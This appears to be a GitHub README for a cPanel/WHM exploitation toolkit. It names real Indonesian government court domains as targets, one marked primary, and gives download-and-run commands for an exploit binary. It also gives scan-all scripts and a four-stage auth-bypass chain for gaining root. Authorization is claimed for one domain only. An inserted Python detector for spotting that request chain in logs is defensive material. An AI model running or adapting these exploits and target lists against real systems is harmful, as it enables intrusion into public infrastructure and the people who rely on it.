dikurdikur/indo-cpanel-exploit

🦉 Indo cPanel Exploit Toolkit

⚠️ FOR AUTHORIZED SECURITY TESTING ONLY

Tools and exploits for authorized penetration testing of Indonesian government infrastructure (.go.id). Use only with written permission.

Quick Install

# Clone repo
git clone https://github.com/dikurdikur/indo-cpanel-exploit.git
cd indo-cpanel-exploit

# Run setup
./scripts/setup.sh

Or download pre-built binary:

wget https://github.com/dikurdikur/indo-cpanel-exploit/releases/latest/download/cve-2026-41940
chmod +x cve-2026-41940
./cve-2026-41940 -u cpanel.target.go.id -p 2087

Requirements

  • Go 1.21+ (to compile the exploit)
  • curl, wget, git
  • Indonesian IP address (required; the targets block foreign IPs)

Tools Included

| Tool | Description |
|------|-------------|
| CVE-2026-41940 | cPanel WHM Auth Bypass via CRLF Injection |
| CVE-2023-29489 | cPanel XSS → RCE |
| cpanel-scanner | Multi-target cPanel vulnerability scanner |
| softploit | Softaculous RCE exploit |

Targets

15+ exposed cPanel instances on Indonesian government domains:

  • cpanel.pa-banjarkota.go.id ← PRIMARY TARGET
  • cpanel.pa-bandung.go.id
  • cpanel.pa-bogor.go.id
  • cpanel.pa-ciamis.go.id
  • cpanel.pa-cianjur.go.id
  • ... (see reports/cpanel_targets.txt)

Usage

1. Scan single target

./exploits/cve-2026-41940/cve-2026-41940 -u https://cpanel.target.go.id:2087

2. Scan all targets

./scripts/scan_all.sh

3. Generate report

./scripts/generate_report.sh

CVE-2026-41940 Exploit Chain

Stage 1: Mint preauth session → POST /login/?login_only=1
Stage 2: CRLF injection → GET / + Authorization: Basic <CRLF_PAYLOAD>
Stage 3: Propagate → /scripts2/listaccts
Stage 4: Verify root → /cpsess<TOKEN>/json-api/version
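
For defenders, the four request shapes above can be hunted for in WHM request records. The following is an added example, not code from this repository: it flags clients that walk the stages in order within a time window and counts stage 2 only when the Basic credential carries CR/LF. The record layout, the 60-second window, and the assumption that the CR/LF appears in the raw or base64-decoded credential are assumptions; the sample records are constructed.

```python
import base64
import binascii
import re

# Request shapes from the four stages listed above, matched in order per client.
STAGES = [("POST", re.compile(r"^/login/\?login_only=1")),
          ("GET", re.compile(r"^/$")),
          (None, re.compile(r"^/scripts2/listaccts")),
          (None, re.compile(r"^/cpsess[^/]+/json-api/version"))]
WINDOW = 60  # seconds; assumed correlation window, tune for your environment

def basic_auth_has_crlf(header):
    """True if a Basic credential carries CR/LF, raw or after base64 decoding."""
    if not header or not header.lower().startswith("basic "):
        return False
    token = header[6:]
    try:
        decoded = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return "\r" in token or "\n" in token  # not valid base64: check raw value
    return b"\r" in decoded or b"\n" in decoded

def find_chains(requests):
    """Client IPs that walk all four stages in order within WINDOW seconds."""
    progress, hits = {}, []
    for ts, ip, method, path, auth in sorted(requests, key=lambda r: r[0]):
        idx, start = progress.get(ip, (0, ts))
        if idx == 0 or ts - start > WINDOW:
            idx, start = 0, ts  # no chain in progress, or the partial one went stale
        want_method, want_path = STAGES[idx]
        ok = bool(want_path.search(path)) and want_method in (None, method)
        if ok and idx == 1:
            ok = basic_auth_has_crlf(auth)  # stage 2 counts only with CR/LF present
        if ok:
            idx += 1
            if idx == len(STAGES):
                hits.append(ip)
                idx = 0
        progress[ip] = (idx, start)
    return hits

# Constructed sample records: (epoch s, client IP, method, path, Authorization).
BAD = "Basic " + base64.b64encode(b"user:pw\r\nx: y").decode()
SAMPLE = [(0, "203.0.113.7", "POST", "/login/?login_only=1", None),
          (1, "203.0.113.7", "GET", "/", BAD),
          (2, "203.0.113.7", "GET", "/scripts2/listaccts", None),
          (3, "203.0.113.7", "GET", "/cpsess0000000000/json-api/version", None),
          (4, "198.51.100.9", "POST", "/login/?login_only=1", None),
          (5, "198.51.100.9", "GET", "/", "Basic dXNlcjpwdw==")]
```

`find_chains(SAMPLE)` reports only the first client; the second logs in with an ordinary credential and never advances past stage 1.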

Authorized Targets

  • ✅ pa-banjarkota.go.id (authorization: May 6 - June 10, 2026)
  • Other targets: adjust scope and authorization accordingly

Disclaimer

These tools were created for legitimate security purposes (authorized testing & responsible disclosure). Use without permission is a violation of the law.

About

Automated cPanel exploitation toolkit for authorized security testing
